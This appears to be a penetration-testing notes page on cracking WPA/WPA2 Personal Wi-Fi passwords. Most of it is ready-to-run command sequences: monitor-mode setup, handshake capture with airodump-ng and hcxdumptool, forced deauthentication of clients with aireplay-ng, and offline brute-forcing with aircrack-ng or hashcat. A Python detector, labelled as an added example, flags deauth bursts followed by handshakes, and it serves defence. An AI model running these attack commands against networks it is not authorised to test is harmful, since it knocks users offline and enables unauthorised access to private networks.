# WPA/WPA2 Personal

WPA2 (Wi-Fi Protected Access II) is a widely used security protocol for securing wireless networks. While it is considered more secure than its predecessor, WPA (Wi-Fi Protected Access), it is not without its vulnerabilities.

Gaining access to a WPA2 Personal network consists of capturing the target network's handshake and brute-forcing the network's secret password. Brute-forcing the secret password can be done using either [Aircrack-ng](https://www.aircrack-ng.org) or [hashcat](https://hashcat.net/hashcat/).

Note that these attacks were done using a Wi-Fi adapter such as this [Alfa Wi-Fi Adapter](https://www.alfa.com.tw/products/awus036ach?variant=36473965871176).

## Setup

```bash
## Kill processes that may interfere with monitor mode
airmon-ng check kill

## Start Monitor Mode
airmon-ng start [network interface]
```

## Exploit (Aircrack-ng)

```bash
## Sniff packets on a specific BSSID and save to a file to analyze
airodump-ng [interface] --bssid [bssid] --channel [channel] --write [output file]

## Deauth a device on the network so we can capture the handshake when it tries to reconnect to the network
aireplay-ng --deauth 10 -a [target network bssid] -c [target device bssid] [interface]

## Use the captured handshake along with a wordlist to try to brute-force the password
aircrack-ng [airodump.cap file] -w [wordlist]
```
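Seen from the monitoring side, the deauth-then-reconnect sequence above shows up as a burst of deauthentication frames aimed at one client, followed shortly by that client's EAPOL handshake. The following is an added detection example, not part of the original page. The record format, the thresholds and the function name `find_forced_handshakes` are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict, deque

# Constructed sample records (not real capture data): (seconds, frame kind, BSSID, client MAC).
# A monitoring sensor is assumed to have already decoded frames into this shape.
AP = "aa:bb:cc:00:00:01"
SAMPLE = (
    [(1.0, "deauth", AP, "11:22:33:00:00:0a")]  # single deauth: ordinary background noise
    + [(10.0 + i * 0.05, "deauth", AP, "11:22:33:00:00:0b") for i in range(20)]  # burst
    + [(12.5, "eapol", AP, "11:22:33:00:00:0b")]  # same client re-authenticates
    + [(40.0, "eapol", AP, "11:22:33:00:00:0c")]  # ordinary join, no preceding burst
)

def find_forced_handshakes(frames, burst=10, window=2.0, follow=10.0):
    """Return alerts for (bssid, client) pairs where at least `burst` deauth
    frames arrive within `window` seconds and an EAPOL handshake follows within
    `follow` seconds of the burst. Thresholds are assumed; tune them per site."""
    recent = defaultdict(deque)   # pair -> timestamps of recent deauth frames
    burst_at = {}                 # pair -> time the burst condition was last met
    alerts = []
    for ts, kind, bssid, client in sorted(frames):
        pair = (bssid, client)
        if kind == "deauth":
            q = recent[pair]
            q.append(ts)
            while q and ts - q[0] > window:   # drop timestamps outside the window
                q.popleft()
            if len(q) >= burst:
                burst_at[pair] = ts
        elif kind == "eapol" and pair in burst_at:
            if ts - burst_at[pair] <= follow:
                alerts.append({"bssid": bssid, "client": client,
                               "burst_end": burst_at[pair], "handshake": ts})
            del burst_at[pair]                # one alert per burst
    return alerts

if __name__ == "__main__":
    for alert in find_forced_handshakes(SAMPLE):
        print("possible forced re-authentication:", alert)
```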

## Exploit (hashcat)

```bash
## Stop all services that are accessing the WLAN device
systemctl stop NetworkManager.service
systemctl stop wpa_supplicant.service

## Capture Wi-Fi traffic
hcxdumptool -i [interface] -o [outputfile.pcapng] --active_beacon --enable_status=15

## Restart stopped services to regain network connection
systemctl start NetworkManager.service
systemctl start wpa_supplicant.service

## Convert the .pcapng file to Hashcat format 22000
hcxpcapngtool -o [output.hc22000] -E [wordlist output name] [outputfile.pcapng]

## Run Hashcat using the wordlist from the above command and hc22000 output
hashcat -m 22000 [output.hc22000] [wordlist output]
```

## References

{% embed url="https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2" %}

{% embed url="https://manpages.debian.org/testing/hcxtools/hcxpcapngtool.1.en.html" %}
